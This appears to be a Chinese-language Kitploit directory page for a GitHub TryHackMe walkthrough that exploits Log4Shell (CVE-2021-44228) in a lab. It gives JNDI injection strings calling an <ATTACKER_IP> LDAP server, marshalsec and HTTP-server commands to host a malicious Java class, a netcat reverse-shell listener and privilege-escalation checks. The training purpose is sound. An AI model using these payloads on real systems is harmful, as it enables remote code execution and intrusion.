Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
solar-exploiting-log4j — 该仓库提供了TryHackMe上*Solar Exploiting Log4j房间*的详细演练,重点是利用关键的Log4Shell漏洞 (CVE-2021-44228)。该项目演示了攻击者如何利用Java应用程序中不安全的日志记录机制实现远程代码执行。 | Kitploit
工具/GitHubGitHub/lavanya2085/solar-exploiting-log4j
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育实验室与实践
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

该仓库提供了TryHackMe上*Solar Exploiting Log4j房间*的详细演练,重点是利用关键的Log4Shell漏洞 (CVE-2021-44228)。该项目演示了攻击者如何利用Java应用程序中不安全的日志记录机制实现远程代码执行。

查看仓库
135个月前尚未审核
分享

🔥 Solar利用Log4j - TryHackMe演练

📌 房间: Solar利用Log4j

平台: TryHackMe 难度: 中等 主题: Log4Shell (Log4j漏洞)


🧠 目标

利用Log4j漏洞(CVE-2021-44228)获取远程代码执行并捕获旗帜。


🛠️ 使用的工具

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 第一步:侦察

🔍 扫描目标

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 发现

  • 开放端口:80 (HTTP),其他取决于房间
  • Web应用程序运行基于Java的后端

🌐 第二步:Web枚举

  • 在浏览器中访问Web应用
  • 与输入字段交互(登录/搜索/头部字段)
  • 使用Burp Suite捕获请求

💥 第三步:识别Log4j漏洞

Log4j漏洞允许JNDI注入:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

如果输入被记录 → 存在漏洞。


⚙️ 第四步:设置监听器

启动Netcat

root@kitploit:~
nc -lvnp 4444

启动恶意LDAP服务器(示例)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

运行LDAP服务器:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 第五步:托管Payload

root@kitploit:~
python3 -m http.server 8000

创建恶意Java类 (Exploit.class)


🚀 第六步:触发漏洞利用

将payload注入到易受攻击的字段中:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 使用类似以下头部:

  • User-Agent
  • X-Api-Version

🖥️ 第七步:获取反弹shell

一旦触发:

  • 目标连接回Netcat监听器
  • 获得shell访问

🔐 第八步:权限提升(如果需要)

检查:

root@kitploit:~
sudo -l

查找:

  • 配置错误的SUID二进制文件
  • 可写的文件
  • Cron作业

🚩 第九步:捕获旗帜

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 学到的关键概念

  • Log4Shell (CVE-2021-44228)
  • JNDI注入
  • 远程代码执行 (RCE)
  • 反弹Shell
  • Web漏洞利用
下载工具